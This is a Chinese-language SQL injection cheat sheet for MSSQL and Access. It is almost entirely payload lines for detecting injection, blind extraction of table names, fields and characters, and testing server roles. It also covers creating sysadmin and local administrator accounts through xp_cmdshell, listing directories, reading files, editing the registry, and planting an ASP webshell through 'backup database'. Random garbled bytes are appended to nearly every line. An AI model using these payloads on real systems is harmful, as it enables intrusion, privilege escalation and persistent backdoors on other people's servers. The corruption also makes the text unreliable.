1.判断是否有注入;and 1=1 ;and 1=2 � �h}}7_I9
2.初步判断是否是mssql ;and user>0 O�bataUxQT
�9��Qkss�I
3.注入参数是字符'and [查询条件] and ''=' *48L�Q�zc
�TLg �9`UA
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �GT3}'`f B
m-�q��O�yt
5.判断数据库系统 ��6K�� >(n
^pl�P�1�c:
;and (select count(*) from sysobjects)>0 mssql �R5 E�C�/@
v4\
�m9Pu4
;and (select count(*) from msysobjects)>0 access EPM�(hxCIQ
�S-br�V\v7
buHUB�n[3)
o+�\?E.%%g
6.猜数据库 ;and (select Count(*) from [数据库名])>0 fL�����gHQ
YT@�N$kOg_
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ]ij:>O@�{$
uuy0fQQ8ti
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 - ��@K�T#�
>_X(r�ar0
9.(1)猜字段的ascii值(access) wH�QYBYKcd
z] �|�Y ��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 q�LB(Th\&'
'NnmL�M(oh
(2)猜字段的ascii值(mssql) T n,Ifo�3�
C%P.`Nx�A
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 7f~7vy�dZ}
M��F�$�NcU
10.测试权限结构(mssql) 54��f?��YR
/FcwsD\=$�
�@2\UjEo~
j�Q(%LYX$�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- u�W,�rm�d
@!(V0����-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �L.�a~vk
1
],wzZ�h�A
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��O^R��^Aw
8�)J,�jh9q
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- "||G`%aO+t
=I+5sCF{�g
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- RP �wP4�Z�
X<�H+�Z2d�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ~>�}7+p
?;
Ll�^9,G"Tt
;and 1=(select IS_MEMBER('db_owner'));-- <a2K�c� '�
PU�\@^)��$
�K�i3�wqY�
92�*Y( >��
11.添加mssql和系统的帐户 �v�2m�qM5Z
BFn}~\wz�K
;exec master.dbo.sp_addlogin username;-- ?��=?�9a��
;exec master.dbo.sp_password null,username,password;-- ��yF^)H{yx
�Q\$cBSJC1
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- "C�+Fl
/v
�Pm�Da�r<m
;exec master.dbo.xp_cmdshell 'net user username password �|>nVp:�t^
,q�
�Bu5�t
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- l��3kBt-�m
o�F0*X�$_X
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �r}�t%D�H�
uC�1�v^!D
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- et�}s y�PH
%W�$�?*T�m
?^:
xNRE$j
��1�;+�(HB
12.(1)遍历目录 q5~fU$�� ,
vu)�V�:��y
;create table dirs(paths varchar(100), id int) ���DFqVZ��
�jyjK~�!0�
;insert dirs exec master.dbo.xp_dirtree 'c:\' h,'m*@�E�g
}sGH�}n<9*
;and (select top 1 paths from dirs)>0 hC2Ra "te)
=+wkjT��O
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) _NM=9c�W�d
eadY(-4|I-
5W?�r04���
@nF��#�\��
(2)遍历目录 _�"[O�=�h:
�]�F,v#6qi
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- LD}�ZuCp!�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U^$l$"~�"�
��3 jay �V
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 HoKN���<w
[�Uu!:��SZ
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
*:V"C\`^n
n!\&X�9%[8
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 N/��mC,�7Q
��A��*hc
w
`]g��}M��,
2<5s0G�T'/
13.mssql中的存储过程 NU|�T`�g�P
"@E(}z�'sM
xp_regenumvalues 注册表根键, 子键 =n�N&8�vRH
�|70L��h�+
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 v\ X�k�6k�
�Y<��-dd"\
xp_regread 根键,子键,键值名 0@8EIQxK"�
||�k^�pzj%
;exec xp_regread 4 5�\%2u�n
_zj}i1!E"�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �LP:C9�Ol\
�BM]sW:-v�
xp_regwrite 根键,子键, 值名, 值类型, 值 FA�;u�u��\
��F>A&�L8
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 kc�ulHIa\.
pUaGrdGxzQ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 A����ZYu/k
ySwvj�P7f
xp_regdeletevalue 根键,子键,值名 H?axl�Rmw3
4]]1J�L(Ka
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `;!v�<@:i2
'y.'Xj�:�l
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ``mW\=�fe
/8w
��_jjW
NE��h5��
�
u4[3JI��>�
14.mssql的backup创建webshell �O486:t��F
*�.9.BD�9�
use model #~^Y�2-�C#
I8 {�2c�M;
create table cmd(str image); j*jO80�9%^
I� 0}+}{M:
insert into cmd(str) values (''); g��yW##M@{
n/5)}( }K�
backup database model to disk='c:\l.asp';
�C����vtG
�q@�x{6z�j
�z�a20Y?)[
we&g9�j'�
15.mssql内置函数 ,�kKMUshBi
|JW-P`tL0�
;and (select @@version)>0 获得Windows的版本号 3M�{�/9rR[
�}
��.��cP
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 0SBi�M��Tm
g^DPb�pWxu
;and (select user_name())>0 爆当前系统的连接用户 �T�6ajW�Uw
�"!6� Ax-'
;and (select db_name())>0 得到当前连接的数据库 4#m��"t?6!
vxzOG?Xc:�
�skn`Q>��a
)�5U�&�^tJ
16.简洁的webshell T�=�w5FT��
=�@���>[
use model �XZe�Z�qBr
ggUJ -M'2h
create table cmd(str image); �yA+:\%y$�
?�qt>;o|Ue
insert into cmd(str) values (''); p}N�IZ�)]$
"7pd�(p *C
backup database model to disk='g:\wwwtest\l.asp';
